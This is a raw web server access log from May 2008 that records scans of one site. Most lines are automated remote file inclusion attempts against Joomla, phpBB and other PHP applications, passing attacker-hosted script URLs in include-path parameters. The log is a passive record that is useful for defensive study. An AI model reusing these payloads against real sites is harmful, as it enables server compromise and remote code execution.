88.191.25.42 - - [19/May/2008:09:21:18 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.173 - - [19/May/2008:09:21:27 -0700] "GET /logs/access_080116.log HTTP/1.0" 200 601743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:21:43 -0700] "GET /logs/modifyform.html?code=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:21:46 -0700] "GET /modifyform.html?code=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:21:55 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:22:14 -0700] "GET /logs/modifyform.html?code=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:22:21 -0700] "GET /modifyform.html?code=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:22:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:22:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:22:32 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:22:52 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:22:52 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:09:23:30 -0700] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:09:23:30 -0700] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.53.226 - - [19/May/2008:09:23:50 -0700] "GET //modules/Forums/admin/index.php?phpbb_root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:23:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:23:55 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:24:36 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:24:36 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:24:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:24:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:24:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:24:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:25:16 -0700] "GET /logs/access.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:25:16 -0700] "GET //administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:25:17 -0700] "GET /logs//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:09:25:19 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:25:21 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:25:21 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:25:26 -0700] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:25:26 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:09:25:26 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:09:25:26 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:25:26 -0700] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:25:29 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:25:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:25:41 -0700] "GET /Encoder.php?base_dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:09:25:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:09:25:43 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:25:44 -0700] "GET /logs/Encoder.php?base_dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:25:52 -0700] "GET /logs/Encoder.php?base_dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:25:52 -0700] "GET /Encoder.php?base_dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:09:25:53 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:09:25:53 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:26:01 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:26:01 -0700] "GET /show.php?file=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:26:02 -0700] "GET /logs/show.php?file=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
205.234.105.183 - - [19/May/2008:09:26:02 -0700] "GET /logs/access_080201.log/?pagina=http://61.19.234.26/.daemon/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:26:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:09:26:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:26:29 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:26:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:26:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:26:29 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:26:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:26:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:09:27:07 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:09:27:07 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.209.104 - - [19/May/2008:09:27:18 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.arai.web.id/jek/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.209.104 - - [19/May/2008:09:27:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.arai.web.id/jek/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.209.104 - - [19/May/2008:09:27:19 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.arai.web.id/jek/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.209.104 - - [19/May/2008:09:27:52 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.arai.web.id/jek/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.16.207.162 - - [19/May/2008:09:27:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.16.207.162 - - [19/May/2008:09:27:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.254.184.125 - - [19/May/2008:09:28:04 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.254.184.125 - - [19/May/2008:09:28:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:09:28:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:09:28:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:28:20 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:28:20 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:09:28:26 -0700] "GET /show.php?file=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:09:28:26 -0700] "GET /logs/show.php?file=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.55.53.226 - - [19/May/2008:09:28:38 -0700] "GET /logs/access_080218.log//modules/Forums/admin/index.php?phpbb_root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:28:40 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.137.164.40 - - [19/May/2008:09:28:43 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://rooting.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
78.137.164.40 - - [19/May/2008:09:28:43 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://rooting.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:09:28:43 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:29:21 -0700] "GET /logs//components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:29:21 -0700] "GET //components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:29:27 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:29:27 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:29:28 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.209.104 - - [19/May/2008:09:29:28 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.arai.web.id/jek/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:46 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:46 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:47 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:49 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:49 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:50 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:51 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:52 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [19/May/2008:09:29:52 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:29:55 -0700] "GET /logs/access.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:29:55 -0700] "GET //administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:29:56 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:29:56 -0700] "GET /logs/access_071224.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:29:56 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
